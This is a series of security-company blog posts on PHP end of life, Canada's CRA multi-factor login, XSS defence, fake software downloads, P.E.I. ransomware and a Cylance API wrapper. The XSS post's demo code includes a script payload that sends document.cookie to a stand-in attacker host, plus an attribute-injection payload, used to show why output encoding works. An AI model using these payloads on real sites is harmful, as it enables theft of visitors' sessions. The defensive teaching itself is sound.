Justin Robinson

PHP7.2 End of Life and the OWASP® ModSecurity Core Rule Set (CRS)

OWASP

On November 30th, 2020, PHP 7.2 reached end of life (EOL). Once a release is EOL it is no longer supported: newly discovered vulnerabilities receive no security patches, so an EOL runtime quickly becomes a liability. None of Rogue Security's customers currently uses this version of PHP, so we have taken the needed step of uninstalling PHP 7.2 from all of our website hosting servers; after validation we can confidently say that the change was successful.

You can always come back here to find the link to the list of Current PHP Supported Versions, and we’d recommend you also check out Migrating from PHP 7.2.x to PHP 7.3.x. PHP 8.0, the next major release, will be available at Rogue Security on December 18th, 2020.

Here is a complete list of modules that are no longer available.

Over the course of future posts we'll introduce you to many different aspects of OWASP (Open Web Application Security Project). One of our principal website hosting security features is the OWASP® ModSecurity Core Rule Set (CRS), a set of generic attack detection rules for use with ModSecurity or other compatible web application firewalls. So what does this mean? It means that requests to every site we host are screened by a maintained, community-developed rule set that detects the most common classes of web application attack, such as SQL injection and cross-site scripting, before they reach your application. Find out more at coreruleset.org.

Government of Canada Quietly Rolls Out Multi-Factor Authentication

Authentication

I don't quite know when, but the Government of Canada seems to have quietly rolled out multi-factor authentication (MFA) on its CRA portal. I expect this happened sometime within the last week; at least for me it did. The only information I found on their website is detailed in this post.

This new service, named GCVerify, is a phone/SMS-based MFA solution that is now required after logging in to your CRA Account with either your GCKey credentials or Sign-In Partner.

If it’s the first time that you’ve logged in since the implementation you’ll be walked through setting up MFA by providing your phone number. You’ll receive a code via telephone call or SMS to confirm your identity.

InfoSec Check

Identity Validation

This identity validation confirms that you control the phone number that is being associated with your username.

You should never allow anyone else access to your telephone or text messages. A threat actor who can read your text messages, for example after taking over your phone number through a SIM swap at your carrier, can bypass SMS-based two-factor authentication (2FA) very easily. If given the choice, use an authenticator application (such as Google Authenticator) that generates the codes on the device itself instead of receiving them over the phone network.

After setup you will be prompted to enter a one-time passcode every time that you log in to your CRA account. This includes both Personal and Business accounts.

Multi-factor Authentication page as seen during the Government of Canada CRA Login

The Personal Information Collection Statement page has also been updated (third paragraph) to reflect the changes, although the information itself leaves much to be desired. I've copied the paragraph that talks specifically about multi-factor authentication below.

We have a multi-factor authentication process for our online services. We collect the telephone number (landline or cell), method of delivery of the one-time passcode (telephone call or Short Message Service (SMS)) and language of choice to receive the one-time passcode that you provide when enrolling in multi-factor authentication. We share this information with the third party responsible for generating and sending you the code. The code you enter is also shared with the third party to ensure it matches before allowing you access to our online services.

It doesn't specifically mention which vendor; however, when I dug through the Public Works and Government Services Canada website, I came across a tender notice titled Invitation to Qualify (ITQ) Identity and Access Management (IdAM) Software Solution, posted 2020/06/22, that has several mentions of multi-factor authentication. It's a bit of an assumption, but I wasn't able to find anything more relevant. It lists N7030: ADP Software as the Goods and Services Identification Number (GSIN).

This is definitely a step forward, but hopefully not a stopping point for the Government of Canada. As mentioned, phone-based and SMS-based MFA has its own issues, but at least it's something, right? The fact that it's enforced on each and every login is great, and the one-time passcodes do time out, although I'm unsure how long that timeout is. But you can't currently manage any part of the service yourself, so if you want to update your telephone number you will have to contact the CRA helpdesk at 1-800-959-8281.

And no, you can't disable it. But I wouldn't suggest that you do anyway.


Additional Resources:

Multi-factor authentication to access CRA login services

Introducing $7 Business Website Hosting

Server Racks

Your website is a target. It's a target for your clients, who use it to find information about your business, and for those who wish to do your business and its interests harm. This has never been more true than in 2020: Covid-19 has pushed many businesses to a work-from-home model, and people are living more of their lives online from home.

Rogue Security builds the C.I.A. triad into every product and service that we develop, and our Business Website Hosting service is no exception. This focus on Confidentiality, Integrity, and Availability ensures that your business website is accessible and secure from the ground up.

Website Hosting Made Simple

Using WordPress Toolkit you can get your business website up and running quickly. WordPress Toolkit is a cPanel plugin that lets you install, update and manage your WordPress installation without logging into it. AutoSSL requests and installs a Let's Encrypt-signed SSL/TLS certificate for any of your domain names quickly and easily, at no additional cost!

Warrantied SSL Certificates are also available for purchase.

Always Available and Protected

Our priority is keeping your website available to your current and future customers. We provide a 99.99% uptime guarantee, which allows for approximately 1 minute of downtime per week for maintenance restarts. We know security: every site we host sits behind the OWASP (Open Web Application Security Project) ModSecurity™ Core Rule Set (CRS), a set of web application firewall rules that detect and block common web attacks before they reach your site.

The Tools You Need

With complete access to cPanel you have all of the tools that you need to build a beautiful, accessible website for your business.

Sign-Up Now

Please contact hosting@roguesecurity.ca for more information and to sign-up.

Cross Site Scripting Attacks On Your Company Website and How to Protect Against Them

Your business's website, and the domain (.com, .ca, .net, etc.) that goes along with it, is an important part of your organisation's identity and is fast becoming the first place consumers go to find out who you are and what you do. The last thing you want, especially during an already strained moment in the world's economy, is for a potential client to be served an ad or redirected to another website when visiting yours.

Cross-site Scripting Vulnerability
There are many ways for an attacker to take advantage of you through your website, including a technique called Cross-Site Scripting, or XSS for short. An XSS vulnerability allows an attacker to inject script into the pages your website serves, so that every visitor's browser runs it as if it were part of your site. The result can be injected ads, redirects, malware downloads, stolen session cookies, or just about anything else a page is allowed to do. In effect, the attacker is using your website as a medium to deliver malicious content to unsuspecting visitors.

An XSS vulnerability exists when your website takes input and places it into a page without properly validating or encoding it, whether the data is reflected straight back in the response or stored and displayed to later visitors. These inputs might include contact forms, search boxes, shopping carts, and login forms. Essentially, any point of data entry on your website can be the target of an XSS attack.

Protecting Against XSS Vulnerabilities
The most effective protection against XSS is to treat everything a visitor sends as untrusted data and to encode it for the context in which it is output. HTML entity encoding, which converts characters such as <, >, &, " and ' into their entity forms (&lt;, &gt;, &amp;, &quot;, &#x27;), is the most common method, because the browser then displays the characters instead of parsing them as markup; attribute values, URLs and JavaScript contexts each need their own encoding. Rejecting or stripping special characters on input is a weaker, secondary control: it breaks legitimate data and is easily bypassed when a single output context was overlooked. XSS vulnerabilities can be identified during development using both Static (SAST) and Dynamic (DAST) Application Security Testing, and should be remediated before code is pushed to production.
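The following is an added example, not code from the original post or from any product it describes. It puts a vulnerable page fragment beside its hardened form, shows why stripping < and > alone is not enough, and uses constructed payloads of the kind a tester would submit to a contact form. The form field name, the attacker host and the search URL are all made up for the illustration.

```python
import html
from urllib.parse import quote

# Constructed test inputs (not taken from the original post): what a tester
# would type into a contact form's "name" field.
BENIGN_NAME = "Mary O'Brien & Sons <Plumbing>"
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_unsafe(name: str) -> str:
    """Vulnerable: the submitted value is concatenated straight into HTML, both
    as element text and inside a quoted attribute."""
    return f'<p>Thanks, {name}!</p>\n<input name="name" value="{name}">'


def strip_angle_brackets(name: str) -> str:
    """The 'block special characters' approach many sites reach for first. It
    stops the <script> payload but not the attribute payload, which needs
    neither < nor > to break out of the value="..." quotes."""
    return name.replace("<", "").replace(">", "")


def render_safe(name: str) -> str:
    """Hardened: encode the value for each output context. html.escape(quote=True)
    turns & < > " ' into entities, so the browser shows the text instead of
    parsing it and the attribute value cannot escape its quotes; a value placed
    in a URL query string is percent-encoded instead."""
    safe_text = html.escape(name, quote=True)
    safe_attr = html.escape(name, quote=True)
    safe_url = quote(name, safe="")
    return (
        f"<p>Thanks, {safe_text}!</p>\n"
        f'<input name="name" value="{safe_attr}">\n'
        f'<a href="/search?q={safe_url}">Search again</a>'
    )


def is_exploitable(rendered: str) -> bool:
    """Crude check for the demo: did either payload survive as live markup?
    A real test runs the page in a browser or through a DAST scanner."""
    return "<script>" in rendered or 'onfocus="alert(' in rendered


if __name__ == "__main__":
    for label, payload in (("script", SCRIPT_PAYLOAD), ("attribute", ATTRIBUTE_PAYLOAD)):
        print(f"{label:9s} unsafe={is_exploitable(render_unsafe(payload))} "
              f"stripped={is_exploitable(render_unsafe(strip_angle_brackets(payload)))} "
              f"encoded={is_exploitable(render_safe(payload))}")
    print(render_safe(BENIGN_NAME))
```

Note that the benign name survives encoding intact as far as the visitor is concerned (the browser renders "Mary O'Brien & Sons <Plumbing>" as typed), which is exactly what an input blocklist would have broken.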

Many websites, including this one, rely on a Content Management System (CMS) to manage and display content. WordPress and Drupal are just a couple of examples. When using a CMS you will rely on plug-ins to provide functionality like contact forms, and while you can't know with 100% certainty what security controls were used in the development of a plug-in, you do have the ability to keep it updated with the latest software patches. Your CMS lets you update plug-ins through its administration dashboard. WordPress 3.7 introduced automatic background updates, but only minor core updates are enabled by default; automatic plug-in updates need to be turned on (through the auto_update_plugin filter or, since WordPress 5.5, the per-plugin toggle on the Plugins screen).

Resources
OWASP – Cross Site Scripting (XSS)

How Hackers Use Free Software To Spread Malware

Bad Microsoft Store Downloads

In a world where the Covid-19 virus is dominating and forcing businesses to shutter or employees to work from home, technology companies are stepping up in a big way to offer many of their services and products at reduced or no cost. This has made the forced transition to a primarily remote workforce easier in so many regards, but it also adds an element of risk that some companies aren't necessarily thinking about these days, and I can't blame them.

To understand the risk that software poses, it's important to understand the multitude of ways a bad actor can take advantage of companies offering free software to spread malware and possibly steal your data. When we talk about this type of risk we're often talking about third-party risk: it's third-party because you don't have the same control over the software as you would over something developed in house.

Understanding the Software Supply-Chain

If you look at any piece of enterprise software in 2020 it will almost certainly be built on a number of frameworks like .NET, Node.js, and Ruby on Rails, and on the many third-party packages they pull in. These save thousands of hours of development time by providing libraries of predefined code. In using them, you are most likely NOT reviewing the code yourself, but relying on the developers of those libraries to ensure that vulnerabilities don't exist in their code and on the distribution channel to deliver it unmodified.

A well-known example of a supply-chain attack is the 2013 Target breach. The attackers first compromised Target's HVAC vendor and stole the credentials the vendor used to reach Target's network; that legitimate third-party access got them inside. Once inside, they only needed to move laterally to more important systems, in that case the point-of-sale systems, with more important information on them.

Free Software Makes Supply-Chain Attacks Easier

I love free software as much as the next guy, just make sure that you're getting it from an appropriate source. A quick search on Microsoft's very own Store brought up a number of free software titles being peddled for cash (seen in the picture above). These are NOT official releases of this software, but they are certainly easier for any Windows user to find than the official ones. Here are the actual and safe links, for your information.

https://www.qbittorrent.org/
http://www.darkaudacity.com/
https://www.smplayer.info/
https://pwsafe.org/

There is simply no guarantee that these publishers didn't modify the software in some way that tracks you or steals data. In many cases such publishers bundle adware to make a quick buck.

Protecting Yourself

  • Track any third-party code or vendor relationships so that security releases are applied when they appear. This might be as simple as an Excel spreadsheet or as complex as an entire third-party risk management department.
  • Always download software from official sources. A quick Google search for the software will often bring up the appropriate website as the first result, but check the domain before downloading; sponsored results and look-alike names can point elsewhere. Where the publisher provides checksums or signatures, verify the download against them.
  • Reduce the human factor by providing employees with security awareness training on a regular basis.
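As an added example (not from the original post, and not tied to any of the projects linked above), the following verifies a downloaded installer against a publisher's SHA256SUMS file, the check that tells you whether the bytes you have are the bytes the official site published. The checksum file, file names and file contents here are constructed for the illustration: the "genuine" installer is literally the bytes abc, whose SHA-256 digest is the well-known value shown.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

# Constructed stand-in for a publisher's SHA256SUMS file (not a real release).
# The genuine installer here is the bytes b"abc"; the digest is SHA-256("abc").
PUBLISHED_SUMS = """\
# SHA256SUMS for example-tool 1.0 (constructed for this example)
ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad  example-tool-1.0-setup.exe
ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad *example-tool-1.0-setup.bin
"""

HEX = set("0123456789abcdef")


def parse_sha256sums(text: str) -> dict:
    """Parse sha256sum(1) output: one '<digest>  <name>' (text mode) or
    '<digest> *<name>' (binary mode) per line. Malformed lines are an error,
    not something to skip silently."""
    sums = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition(" ")
        name = name.lstrip(" *")
        digest = digest.lower()
        if not sep or not name or len(digest) != 64 or set(digest) - HEX:
            raise ValueError(f"malformed checksum line: {raw!r}")
        sums[name] = digest
    return sums


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file so large installers never have to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            h.update(block)
    return h.hexdigest()


def verify_download(path: Path, sums: dict) -> bool:
    """True only if the file's digest matches the published digest for its
    file name. Unknown names fail closed; compare_digest avoids timing leaks."""
    expected = sums.get(path.name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_of_file(path), expected)


def demo() -> dict:
    """Write a genuine copy, a tampered copy and an unlisted file to a temp
    directory and verify each against the published sums."""
    sums = parse_sha256sums(PUBLISHED_SUMS)
    with tempfile.TemporaryDirectory() as tmp:
        genuine = Path(tmp, "example-tool-1.0-setup.exe")
        genuine.write_bytes(b"abc")
        tampered = Path(tmp, "example-tool-1.0-setup.bin")
        tampered.write_bytes(b"abc" + b"\x90")   # one appended byte, e.g. a bundled adware stub
        unlisted = Path(tmp, "some-other-download.exe")
        unlisted.write_bytes(b"abc")
        return {
            "genuine": verify_download(genuine, sums),
            "tampered": verify_download(tampered, sums),
            "unlisted": verify_download(unlisted, sums),
        }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:9s} -> {'OK' if ok else 'FAIL'}")
```

A checksum only proves the file matches what the same web page says it should be, so fetch the SHA256SUMS file from the official site over HTTPS, not from wherever the installer came from; a detached signature (GPG, or Authenticode on Windows) is the stronger check when the publisher offers one.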

Prince Edward Island Data Breach: Synopsis and Opinion

Ransomware

Ransomware is hitting governments hard. Besides the event that Prince Edward Island experienced, the Canadian territory of Nunavut also experienced a ransomware attack in November of 2019 that crippled systems within that entire government.

Ransomware is a type of malware that, once introduced to a system, denies the user access to their own files. It enumerates the directories on the victim's computer to build a list of target files, then encrypts them, in most cases using Windows' own cryptography API. The keys needed to decrypt the files are held only by the attacker (typically each file key is itself encrypted with the attacker's public key), so the victim has no way to recover them.

Earlier ransomware campaigns focused on spread and relied on sheer quantity of infections to succeed. This was the case with WannaCry and NotPetya, where the intent was to cripple the victim into paying the ransom. Newer ransomware is human-operated: an attacker silently holds control of the victim's network before locking the files, which gives them time to exfiltrate data first. So not only is the victim locked out of their files, but the attacker also holds a copy of those same files to use as leverage.

Paying the ransom is not the answer to ransomware. Paying only perpetuates its effectiveness and conditions the attackers to continue; ransomware has become big business for them. Unfortunately, the obvious result of not paying is that your files will likely be released to a wider audience. Prevention should be the number one focus, but strong incident response and business continuity/disaster recovery plans that include an approved and well-structured communications plan are also essential.

Regardless of whether you pay the ransom or not, it should be assumed that the data will eventually be released. There is no way to verify that the attacker has deleted their copy.

The P.E.I. Ransomware

The Prince Edward Island government was impacted by a ransomware called Maze. Maze has been attributed to Threat Actor 2101, or simply TA2101, by Proofpoint. This ransomware is notable for publishing exfiltrated files on the group's own leak website if victims don't pay, instead of selling the data on dark web forums.

In addition, threat actors can use this trove of data to phish other businesses, which should definitely be a big concern for P.E.I. businesses.

Timeline

2020-02-23 — The government reported a 90-minute ransomware incident before it was contained. At that time the province did not believe that any Islanders’ personal information had been affected.

2020-03-03 — Government documents began showing up online when approximately 800MB (uncompressed) of data was posted on the Internet. According to the Maze ransomware website, the group holds approximately 200GB of archives.

What’s Next?

The likely release of the remaining files must not stall recovery, which will almost certainly involve a hard look at the information security of the province. A forensic investigation will need to determine the extent of the files that may have been accessed. Impacted individuals and businesses will then need to be notified so that they may take appropriate actions, if deemed necessary.

Both Credit Karma and Borrowell offer free credit scores and credit reports every quarter. Impacted individuals can also contact the credit bureaus (Equifax and TransUnion in Canada) to place a fraud alert on their files.

A recent article by Forbes stated that the average cost of a ransomware incident has skyrocketed to over $84,000. This is likely on the low end, as most incidents go unreported and there is no agreed baseline for what a ransomware incident's costs should include. The 2018 ransomware attack on the City of Atlanta was estimated to have cost taxpayers up to $17 million, although I wasn't able to find exact numbers. It is not unreasonable to suggest that this incident may cost the P.E.I. government over $1 million when all is said and done.

CylanceProtect API Wrapper in Python3

Open Source

CylanceProtect is an artificial-intelligence-based anti-virus solution that is now owned by BlackBerry.

A few years ago I wrote a Python3 wrapper for the CylanceProtect API. It's not well tested, but fairly well documented. Feel free to check it out on GitHub and modify it as you see fit.

CyPyAPI was designed as an object-oriented class, so you simply instantiate the object with the required connection settings and then call whatever methods you wish.

import os
import cypyapi

# The tenant ID, application ID and application secret come from the Cylance
# console's integration settings. Read them from the environment (variable
# names chosen here) rather than hard-coding secrets in the script.
tenant_id = os.environ["CYLANCE_TENANT_ID"]
app_id = os.environ["CYLANCE_APP_ID"]
app_secret = os.environ["CYLANCE_APP_SECRET"]

# Create a new CyPyAPI object with the connection settings.
cypyapi_object = cypyapi.CyPyAPI(tenant_id, app_id, app_secret)

# Now call whatever method you wish.
users = cypyapi_object.get_users()

It’s as simple as that.

Check out the code over on GitHub.